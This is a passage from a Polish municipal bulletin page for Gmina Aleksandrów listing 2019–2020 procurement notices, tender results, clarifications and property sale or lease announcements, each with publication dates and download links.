Ośrodka Zdrowia i Szkół na terenie gminy
Aleksandrów...
 
Zawiadomienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-12-07 13:58:50 | Data modyfikacji: 2020-12-15 15:07:55.
Wyjasnienie treści SIWZ - Zakup pojazdu
przeznaczonego do przewozu uczestników na
zajęcia terapeutyczno-rehabilitacyjne w
Środowiskowym Domu Samopomocy w Dąbrówce gm.
Aleksandrów
 
Wyjaśnienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-12-03 15:16:51 | Data modyfikacji: 2020-12-15 15:07:55.
Modyfikacja SIWZ - Zakup pojazdu przeznaczonego do
przewozu uczestników na zajęcia
terapeutyczno-rehabilitacyjne w Środowiskowym
Domu Samopomocy w Dąbrówce gm. Aleksandrów
 
Modyfikacja SIWZ do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-12-02 10:51:46 | Data modyfikacji: 2020-12-15 15:07:55.
Ogłoszenie o zamówieniu - Zakup pojazdu
przeznaczonego do przewozu uczestników na
zajęcia terapeutyczno-rehabilitacyjne w
Środowiskowym Domu Samopomocy w Dąbrówce gm.
Aleksandrów

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 2-7

Załącznik nr 1 do SIWZ

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-12-01 17:29:59 | Data modyfikacji: 2020-12-15 15:07:55.
Unieważnienie postępowania-Zakup pojazdu
przeznaczonego do przewozu uczestników na
zajęcia terapeutyczno-rehabilitacyjne w
Środowiskowym Domu Samopomocy w Dąbrówce gm.
Aleksandrów
 
Zawiadomienie o unieważnieniu do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2020-11-30 15:49:06 | Data modyfikacji: 2020-12-15 15:07:55.
Informacja z otwarcia ofert - Zakup pojazdu
przeznaczonego do przewozu uczestników na
zajęcia terapeutyczno-rehabilitacyjne w
Środowiskowym Domu Samopomocy w Dąbrówce gm.
Aleksandrów
 
Informacja do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2020-11-30 14:33:26 | Data modyfikacji: 2020-11-30 14:36:07.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Budowa chodnika w ciągu drogi powiatowej w
miejscowości Dębowa Góra Kolonia
 
Zawiadomienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-11-24 14:38:30 | Data modyfikacji: 2020-11-30 14:36:07.
Zapytanie ofertowe - 90 ton pelletu drzewnego dla
potrzeb Szkoły Podstawowej w Dąbrowie nad
Czarną
 
Zapytanie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-11-24 14:32:08 | Data modyfikacji: 2020-11-30 14:36:07.
Wyjaśnienie treści SIWZ dotyczące Zakupu
pojazdu przeznaczonego do przewozu uczestników na
zajęcia terapełtyczno-rechabilitacyjne w
Środowiskowym Domu Samopomocy w Dąbrówce gm.
Aleksandrów
 
Wyjaśnienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-11-24 14:08:34 | Data modyfikacji: 2020-11-30 14:36:07.
Odpowiedź na pytanie dotyczące Zakupu pojazdu
przeznaczonego do przewozu uczestników na
zajęcia terapełtyczno-rechabilitacyjne w
Środowiskowym Domu Samopomocy w Dąbrówce gm.
Aleksandrów
 
Odpowiedź do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-11-23 12:41:29 | Data modyfikacji: 2020-11-30 14:36:07.
Ogłoszenie o zamówieniu - Zakup pojazdu
przeznaczonego do przewozu uczestników na
zajęcia terapełtyczno-rechabilitacyjne w
Środowiskowym Domu Samopomocy w Dąbrówce gm.
Aleksandrów

Ogłoszenie o zamówieniu

Załącznik Nr 1

SIWZ wraz z załącznikami 2-7

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-11-20 14:34:33 | Data modyfikacji: 2020-11-30 14:36:07.
Informacja z otwarcia ofert - Dostawa oleju
opalowego dla Urzędu Gminy, Ośrodka Zdrowia i
Szkół na terenie Gminy Aleksandrów
 
Informacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-11-16 14:36:20 | Data modyfikacji: 2020-11-30 14:36:07.
Ogłoszenie o zamówieniu - Dostawa oleju
opałowego dla Urzędu Gminy, Ośrodka Zdrowia i
Szkół na terenie gminy Aleksandrów

Ogłoszenie do pobrania tutaj >>

SIWZ wraz z załącznikami 1-6 >>

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-11-06 14:53:33 | Data modyfikacji: 2020-11-30 14:36:07.
Informacja z otwarcia ofert - Budowa chodnika w
ciągu drogi powiatowej w miejscowości Dębowa
Góra Kolonia
 
Informacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-11-04 12:26:55 | Data modyfikacji: 2020-11-30 14:36:07.
Ogłoszenie o zamówieniu - Budowa chodnika w
ciągu drogi powiatowej w miejscowości Dębowa
Góra Kolonia

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-6

Załącznik Nr 7 - Dokumentacja projektowa

Załącznik Nr 8 - STWiOR

Załącznik Nr 9 - Przedmiar

Załącznik Nr 10 - Projekt stałej organizacji ruchu

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-10-20 15:47:30 | Data modyfikacji: 2020-10-20 15:56:40.
Wykaz nieruchomości przeznaczonych do dzierżawy
 
Wykaz do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-10-19 09:03:01 | Data modyfikacji: 2020-10-20 15:56:40.
Wykaz nieruchomości przeznaczonych do zamiany
 
Wykaz do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-10-07 13:58:26 | Data modyfikacji: 2020-10-20 15:56:40.
Informacja o wyborze najkorzystniejszej oferty -
Budowa centrum rekreacyjno - sportowego w
Aleksandrowie
 
Infromacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-09-25 10:16:44 | Data modyfikacji: 2020-09-29 14:18:43.
Informacja z otwarcia ofert - "Budowa centrum
rekreacyjno - sportowego w Aleksandrowie"
 
Informacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-08-31 13:26:04 | Data modyfikacji: 2020-09-29 14:18:43.
Zawiadomienie o wyborze najkorzystniejszej oferty-
dowóz uczniów do szkół podstawowych na terenie
Gminy Aleksandrów
 
Zawiadomienie do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2020-08-19 15:43:04 | Data modyfikacji: 2020-08-19 15:44:40.
Ogłoszenie o zamówieniu-Budowa centrum
rekreacyjno-sportowego w Aleksandrowie

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-5

Załącznik nr 6

Załącznik nr 7

Załącznik nr 7.

Załącznik nr 8

 

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2020-08-13 14:57:12 | Data modyfikacji: 2020-08-13 15:11:14.
Zawiadomienie o wyborze najkorzystniejszej oferty-
Remont drogi gminnej Dąbrowa nad
Czarną-Kotuszów
 
Zawiadomienie do pobrania tutaj

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2020-08-13 14:06:04 | Data modyfikacji: 2020-08-13 15:11:14.
Rozeznanie cenowe - realizacja dowozu wraz z
zakupem biletów miesięcznych dla uczniów

Rozeznanie cenowe

Formularz ofertowy

Wykaz ilościowy uczniów

Zestawienie cen jednostkowych

Plan tras

Wykaz sprzętu

Wykaz usług

Projekt umowa

Oświadczenie RODO

 

Opublikowane przez: Karolina Grzybowska | Data wprowadzenia: 2020-08-06 14:36:08 | Data modyfikacji: 2020-08-06 14:44:41.
Zapytanie ofertowe o cenę usługi usuwania
odpadów z folii rolniczych, siatki i sznurka do
owijania balotów, opakowań po nawozach i typu
Big Bag
 
Zapytanie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-07-08 12:48:05 | Data modyfikacji: 2020-08-06 14:44:41.
Zapytanie ofertowe ma dostawę Komputerów PC,
Serwera i Notebooka celem modernizacji
wyposażenia zasobów informatycznych Urzędu
Gminy w Aleksandrowie

Zapytanie ofertowe

Załączniki 1-4 do zapytania

Ranking PassMark procesorów desktopowych

Ranking PassMark procesorów laptopowych

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-07-06 15:06:36 | Data modyfikacji: 2020-08-06 14:44:41.
Informacja z otwarcia ofert - Remont dorgi gminnej
Dąbrowa nad Czarną - Kotuszów
 
Informacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-07-01 12:20:24 | Data modyfikacji: 2020-08-06 14:44:41.
Wyjaśnienie treści SIWZ - Remont drogi gminnej
Dąbrowa nad Czarną - Kotuszów
 
Wyjąśnienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-06-26 17:39:46 | Data modyfikacji: 2020-08-06 14:44:41.
Wyjaśnienie treści SIWZ - Remont drogi gminnej
Dąbrowa nad Czarną - Kotuszów
 
Wyjaśnienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-06-24 14:16:27 | Data modyfikacji: 2020-08-06 14:44:41.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Odbiór i zagospodarowanie odpadów komunalnych
z terenu Gminy Aleksandrów
 
Zawiadomienie od pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-06-23 13:54:11 | Data modyfikacji: 2020-08-06 14:44:41.
Ogłoszenie o zamówieniu - Remont dorgi gminnej
Dąbrowa nad Czarną - Kotuszów

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1 - 7

Załącznik Nr 8

Załącznik Nr 9

Załącznik Nr 10

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-06-15 15:36:37 | Data modyfikacji: 2020-06-15 15:41:07.
Informacja z otwarcia ofert - Odbiór i
zagospodarowanie odpadów komunalnych z terenu
Gminy Aleksandrów
 
Informacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-06-05 14:37:16 | Data modyfikacji: 2020-06-05 14:40:01.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Przebudowa drogi powiatowej Nr 1504E
Stara-Skórkowice-Żarnów
 
Zawiadomienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-06-01 15:48:17 | Data modyfikacji: 2020-06-05 14:40:01.
Ogłoszenie o zamówieniu - Odbiór i
zagospodarowanie odapdów komunalnych z terenu
gmina Aleksandrów

Ogłoszenie o przetargu

SIWZ wraz z załacznikami 1-7

Załącznik Nr 8

Załącznik Nr 9

Załącznik Nr 10

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-05-28 15:49:54 | Data modyfikacji: 2020-06-05 14:40:01.
Zawiadomienie o unieważnieniu postępowania -
Odbiór i zagospodarowania odpadów komunalnych z
terenu gminy Aleksandrów
 
Zawiadomienie od pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-05-28 11:16:59 | Data modyfikacji: 2020-06-05 14:40:01.
Informacja z otwarcia ofert - Odbiór i
zagospodarowanie odpadów komunalnych z terenu
gminy Aleksandrów
 
Informacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-05-27 10:43:50 | Data modyfikacji: 2020-06-05 14:40:01.
Modyfikacja SIWZ - Odbiór i zagospodarowanie
odpadów z terenu Gminy Aleksandrów
 
Dokument do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-05-22 16:00:25 | Data modyfikacji: 2020-05-23 08:14:59.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Przebudowa drogi gminnej w miejscowości
Skotniki
 
Zawiadomienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-05-21 13:40:57 | Data modyfikacji: 2020-05-23 08:14:59.
Ogłoszenie o zamówieniu - Odbiór i
zagospodarowanie odpadów z terenu Gminy
Aleksandrów

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-7

Załącznik Nr 8

Załącznik Nr 9

Załącznik Nr 9

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-05-18 13:36:52 | Data modyfikacji: 2020-05-22 16:02:04.
Informacja z otwarcia ofert - Przebudowa drogi
gminnej w miejscowości Skotniki
 
Informacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-05-06 13:56:07 | Data modyfikacji: 2020-05-06 13:59:12.
Informacja z otwarcia ofert - Przebudowa drogi
powiatowej Nr 1504E Stara-Skórkowiece-Żarnów
 
Informacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-05-06 13:55:43 | Data modyfikacji: 2020-05-06 14:03:23.
Ogłoszenie o przetargu - Przebudowa drogi gminnej
w miejscowości Skotniki

Ogłoszenie o przetargu

SIWZ wraz z załącznikami 1-7

Załącznik Nr 8

Załącznik Nr 9

Załącznik Nr 10

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-04-22 15:11:59 | Data modyfikacji: 2020-05-06 14:03:23.
Ogłoszenie o przetargu - Przebudowa drogi
powiatowej Nr 1504E Stara-Skórkowiece-Żarnów

Ogloszenie o przetargu

SIWZ wraz z załącznikami 1-7

Załącznik Nr 8

Załącznik Nr 9

Załącznik Nr 10

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-04-22 15:00:53 | Data modyfikacji: 2020-05-06 14:03:23.
Zawiadomienie o unieważnieniu przetargu -
Przebudowa drogi gminnej w miejscowości Skotniki
 
Unieważnienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-04-21 14:47:45 | Data modyfikacji: 2020-05-06 14:03:23.
Zawiadomienie o unieważnieniu przetargu -
Przebudowa drogi powiatowej Nr 1504E
Stara-Skórkowice-Żarnów
 
Unieważnienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-04-21 14:45:22 | Data modyfikacji: 2020-05-06 14:03:23.
Informacja z otwarcia ofert - Przebudowa drogi
gminnej w miejscowości Skotniki
 
Informacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-04-20 15:27:09 | Data modyfikacji: 2020-04-20 15:27:26.
Informajca z otwarcia ofert - Przebudowa drogi
powiatowej Nr 1504E Stara-Skórkowiece-Żarnów
 
Informacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-04-20 15:20:22 | Data modyfikacji: 2020-04-20 15:27:26.
Wyjaśnienie treści SIWZ - Przebudowa drogi
powiatowej Nr 1504E Stara- Skórkowice- Żarnów
 
Wyjaśnienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-04-16 12:00:49 | Data modyfikacji: 2020-04-20 15:27:26.
Zawiadomienie o wyborze najkorzystniejszej oferty
- zakup 28 Notebooków do trzch szkół
podstawowych w Gminie Aleksandrów
 
Zawiadomienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-04-15 08:31:23 | Data modyfikacji: 2020-04-20 15:27:26.
Ogłoszenie o zamówiniu - Przebudowa drogi
gminnej w miejscowości Skotniki

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-7

Załącznik Nr 8

Załącznik Nr 9

Załącznik Nr 10

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-04-03 15:10:59 | Data modyfikacji: 2020-04-20 15:27:26.
Ogłoszenie o zamówieniu - Przebudowa drogi
powiatowej Nr 1504E Stara- Skórkowice- Żarnów
na odcinku 995m w zakresie przebudowy nawierzchni

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-7

Załącznik Nr 8

Załącznik Nr 9

Załącznik Nr 10

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-04-03 15:06:49 | Data modyfikacji: 2020-04-20 15:27:26.
Zapytanie ofertowe - Zakup 28 notebookow do trzech
szkół podstawowych w Gminie Aleksandrów
 
Zapytanie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-04-03 14:40:57 | Data modyfikacji: 2020-04-20 15:27:26.
Zapytanie ofertowe - Dostawa kruszywa drogowego
dolomitowo-węglanowego
 
zapytanie_kruszywo_dolomitowe_19022020.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-02-19 12:20:49 | Data modyfikacji: 2020-04-20 15:27:26.
Ogłoszenie o Rokowaniach na sprzedaż
nieruchomości w Dąbrowie nad Czarną
 
Ogłoszenie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-02-07 13:27:52 | Data modyfikacji: 2020-04-20 15:27:26.
Zapytanie ofertowe - usługi koparko ładowarką i
samochodem samowyładowczym
 
Zapytanie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-02-03 18:07:26 | Data modyfikacji: 2020-04-20 15:27:26.
Ogłoszenie o przetargu ustnym nieograniczonym na
sprzedaż nieruchomości położonej w
miejscowości Marianów

Ogłoszenie o przetargu

Ogłoszenie wraz oświadczeniami

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-01-31 09:36:31 | Data modyfikacji: 2020-04-20 15:27:26.
Plan postępowań o udzielenie zamówień w 2020
roku
 
Plan do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-01-17 10:48:36 | Data modyfikacji: 2020-04-20 15:27:26.
Zapytanie ofertowe - dokumentacja
projektowo-kosztorysowa inwestycji pn. "Przebudowa
drogi powiatowej Nr 1504E
Stara-Skórkowice-Żarnów na odcinku 995m w
zakresie przebudowy nawierzchni"
 
Zapytanie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-01-08 16:03:19 | Data modyfikacji: 2020-04-20 15:27:26.
Zapytanie ofertowe - Dostawa pelletu drzewnego dla
potrzeb Środowiskowego Domu Samopocy w Dąbrówce
 
Zapytanie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-01-03 13:33:08 | Data modyfikacji: 2020-04-20 15:27:26.
Zapytanie ofertowe - zakup paliwa dla jednostek
Ochotniczych Straży Pożarnych
 
Zapytanie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2020-01-03 11:33:57 | Data modyfikacji: 2020-04-20 15:27:26.
Zapytanie ofertowe - Dostawa pelletu drzewnego dla
potrzeb Środowiskowego Domu Samopomocy w
Dąbrówce
 
Zapytanie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-12-19 16:05:03 | Data modyfikacji: 2020-04-20 15:27:26.
Zapytanie ofertowe dotyczące usługi konserwacji
oświetlenia ulicznego na terenie gminy
Aleksandrów w roku 2020
 
Zapytanei do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-12-10 10:35:22 | Data modyfikacji: 2020-04-20 15:27:26.
Zapytanie ofertowe - zimowe utrzymanie dróg na
terenie gminy Aleksandrów w roku 2020
 
Zapytanie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-12-09 11:19:37 | Data modyfikacji: 2020-04-20 15:27:26.
Wykaz nieruchomości przeznaczonych do sprzedaży
w obrębie Wólki Skotnickiej
 
Wykaz do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-12-06 12:30:13 | Data modyfikacji: 2019-12-06 12:30:26.
Wykaz nieruchomości przeznaczonych do sprzedaży
w obrębie Marianowa
 
Wykaz do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-12-06 12:24:50 | Data modyfikacji: 2019-12-06 12:30:26.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Dostawa oleju opałowego dla Urzędu Gminy,
Ośrodka Zdrowia i Szkół na terenie Gminy
Aleksandrów w sezonie 2019/2020
 
Zawiadomienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-11-13 12:10:30 | Data modyfikacji: 2019-11-13 12:34:58.
Informacja z otwarcia ofert - Dostawa oleju
opałowego dla Urzędu Gminy, Ośrodka Zdrowia i
Szkół na terenie gminy Aleksandrów w sezonie
2019/2020
 
otwarcie_ofert_olej_opalowy_31102019.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-10-31 12:52:30 | Data modyfikacji: 2019-11-13 12:34:58.
Zapytanie ofertowe - usługa sprawowania nadzoru
inwestorskiego podczas realizacji zadania
inwestycyjnego pn : "Remont grogi gminnej Rożenek
- Borowiec"
 
zapytanie_nadzor_inwestorski_rozenek_borowiec_28102019.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-10-28 12:27:04 | Data modyfikacji: 2019-11-13 12:34:58.
Zawiadomienie o wyborze najkorzystniejszej oferty
- 90 ton pelletu drzewnego dla Szkoły Podstawowej
w Dąbrowie nad Czarną
 
wybor_oferty_pellet_24102019.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-10-24 10:04:54 | Data modyfikacji: 2019-11-13 12:34:58.
Ogłoszenie o zamówieniu - Dostawa oleju
opałowego dla Urzędu Gminy, Ośrodka Zdrowia i
Szkół na terenie gminy Aleksandrów w sezonie
2019/2020

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-6

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-10-23 15:34:05 | Data modyfikacji: 2019-11-13 12:34:58.
Zawiadomienie o unieważnieniu postępowania -
Dostawa oleju opałowego dla Urzędu Gminy,
Ośrodka Zdrowia i Szkół na terenie gminy
Aleksandrów w sezonie 2019/2020
 
Zawiadomienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-10-22 16:35:51 | Data modyfikacji: 2019-11-13 12:34:58.
Zawiadomienie o wyborze najkorzystniejszej oferty
- "Remont drogi gminnej Rożenek - Borowiec"
 
Zawiadomenie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-10-21 13:58:00 | Data modyfikacji: 2019-11-13 12:34:58.
Zapytanie ofertowe - czyszczenie i koserwacja
zbiornika na wodę pitną o pojemności 50m3 w
gminie Aleksandrów
 
Zapytanie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-10-18 12:32:51 | Data modyfikacji: 2019-11-13 12:34:58.
Informacja z otwarcia ofert - Dostawa oleju
opałowego dla Urzędu Gminy, Ośrodka Zdrowia i
Szkół na terenie gminy Aleksandrów w sezonie
2019/2020
 
Informacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-10-10 12:01:49 | Data modyfikacji: 2019-10-10 12:02:07.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Budowa infrastruktury sportowo-rekreacyjnej w
miejscowości Dąbrówka
 
wybor_oferty_infrastruktura_sport_rekreac_dabrowka_08102019.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-10-08 14:13:58 | Data modyfikacji: 2019-10-10 12:02:07.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Mała infrastruktura sportowo - rekreacyjna o
charakterze wielopokoleniowym w miejscowości
Reczków Nowy
 
wybor_oferty_mala_infrastruktura_reczkow_08102019.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-10-08 14:10:55 | Data modyfikacji: 2019-10-10 12:02:07.
Ogłoszenie Wójta Gminy Aleksandrów o
Rokowaniach dotyczących sprzedaży działki
położonej w Dąbrowie nad Czarną
 
Ogłoszenie od pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-10-08 12:27:22 | Data modyfikacji: 2019-10-10 12:02:07.
Informacja z otwarcia ofert - Remont drogi gminnej
Rożenek - Borowiec
 
otwarcie_oferty_remont_drogi_borowiec_07102019_.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-10-07 11:45:57 | Data modyfikacji: 2019-10-10 12:02:07.
Zapytanie ofertowe - 90 ton pelletu drzewnego dla
potrzeb Szkoły Podstawowej w Dąbrowie nad
Czarną
 
przetarg_pellet_sp_dabrowa_07102019.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-10-07 09:15:39 | Data modyfikacji: 2019-10-10 12:02:07.
Ogłoszenie o zamówieniu - Dostawa oleju
opałowego dla Urzędu Gminy, Ośrodka Zdrowia i
Szkół na terenie gminy Aleksandrów w sezonie
2019/2020

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-6

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-10-02 13:48:29 | Data modyfikacji: 2019-10-02 14:07:27.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Budowa chodnika w miejscowości Stara
 
wybor_oferty_chodnik_stara_01102019.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-10-01 13:35:41 | Data modyfikacji: 2019-10-02 14:07:27.
Zapytanie ofertowe - zakup sprzętu AGD i
doposażenie świetlicy wiejskiej w ramach
realizowanego projektu pn.: "Biesiada miodowa w
Dąbrowie nad Czarną"
 
zapytanie_ofertowe_doposazenie_swietlicy_OSP_Dabrowa_30092109.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-09-30 12:32:26 | Data modyfikacji: 2019-10-02 14:07:27.
Zapytanie ofertowe - Zakup sprzętu AGD i
doposażenie świetlicy w ramach realizowanego
projektu pn.: "Święto pieczonego ziemniaka w
roku 2019"
 
zapytanie_ofertowe_doposazenie_swietlicy_OSP_w_Starej_30092019.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-09-30 12:29:00 | Data modyfikacji: 2019-10-02 14:07:27.
Zapytanie ofertowe - zakup palnika do spalania
pelletu drzewnego
 
Zapytanie od pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-09-27 16:07:25 | Data modyfikacji: 2019-10-02 14:07:27.
Informacja z otwarcia ofert - Budowa
infrastruktury sportowo-rekreacyjnej w
miejscowości Dąbrówka
 
Informacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-09-25 11:58:19 | Data modyfikacji: 2019-10-02 14:07:27.
Informacja z otwarcia ofert - Mała infrastruktura
sportowo - rekreacyjna o charakterze
wielopokoleniowym w miejscowości Reczków Nowy
 
Informacja do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-09-25 11:54:02 | Data modyfikacji: 2019-10-02 14:07:27.
Zawiadomienie o wyborze najkorzystniejszej oferty
- Zakup średniego samochodu
ratowniczo-gaśniczego z napędem 4x4 dla OSP w
Dąbrowie nad Czarną
 
wybor_oferty_samochod_OSP_Dabrowa_23092019.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-09-23 12:26:21 | Data modyfikacji: 2019-10-02 14:07:27.
Ogłoszenie o zamówieniu - Remont drogi gminnej
Rożenek Borowiec

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-7

Załącznik nr 8 - dokumentacja projektowa

Załącznik nr 9 - przedmiar robót

Załącznik nr 10 - STWiOR

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-09-20 16:12:17 | Data modyfikacji: 2019-10-02 14:07:27.
Informacja z otwarcia ofert - Zakup średniego
samochodu ratowniczo-gaśniczego z napędem 4x4
 
otwarcie_ofert_samochod_OSP_Daborwa_13092019.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-09-13 15:42:23 | Data modyfikacji: 2019-10-02 14:07:27.
Ogłoszenie o zamówieniu - Budowa infrastruktury
sportowo-rekreacyjnej w miejscowości Dąbrówka

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-5

Załącznik Nr 6 - dokumentacja projektowa

Załącznik Nr 7 - STWiOR

Załącznik Nr 8 - przedmiar robót

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-09-10 13:49:06 | Data modyfikacji: 2019-10-02 14:07:27.
Ogłoszenie o zamówieniu - Mała infrastruktura
sportowo - rekreacyjna o charakterze
wielopokoleniowym w miejscowości Reczków Nowy

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 1-5

Załącznik Nr 6 - dokumentacja projektowa

Załącznik Nr 7 - STWiOR

Załącznik Nr 8 - przedmiar robót

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-09-10 13:44:35 | Data modyfikacji: 2019-10-02 14:07:27.
Zapytanie ofertowe - Poprawa estetyki oraz
funkcjonalności przestrzeni publicznej w
miejscowości Rożenek sprzyjającej integracji
społeczności lokalnej w roku 2019
 
Zapytanie_ofertowe_mala_architektura_05092019.pdf

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-09-05 12:31:42 | Data modyfikacji: 2019-10-02 14:07:27.
Ogłoszenie o zamówieniu - Zakup średniego
samochodu ratowniczo-gaśniczego z napędem 4x4

Ogłoszenie o zamówieniu

SIWZ wraz z załącznikami 2-7

Załącznik Nr 1 do SIWZ

 

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-09-05 12:09:55 | Data modyfikacji: 2019-10-02 14:07:27.
Zawiadomienie o unieważnieniu postępowania -
Zakup średniego samochodu ratowniczo-gaśniczego
z napędem 4x4
 
Zawiadomienie do pobrania tutaj >>

Opublikowane przez: Administrator BIP | Data wprowadzenia: 2019-09-04 12:01:46 | Data modyfikacji: 2019-09-05 12:03:08.
